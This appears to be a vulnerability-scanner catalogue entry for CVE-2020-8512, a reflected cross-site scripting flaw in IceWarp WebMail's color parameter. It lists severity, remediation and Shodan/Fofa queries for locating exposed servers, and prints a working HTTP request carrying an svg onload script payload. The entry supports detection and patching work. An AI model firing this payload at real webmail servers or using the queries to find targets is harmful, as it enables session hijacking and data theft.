| Title | IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting |
|---|---|
| Author | pdteam,dwisiswant0 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. |
| Remediation | Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.36838 |
| CVE ID | CVE-2020-8512 |
| CWE ID | CWE-79 |
| Shodan Query | title:"icewarp"http.title:"icewarp" |
| Fofa Query | title="icewarp" |
| Tags | cve cve2020 edb packetstorm xss icewarp vuln |
IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.
GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8512.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-8512.pcap
N/AN/A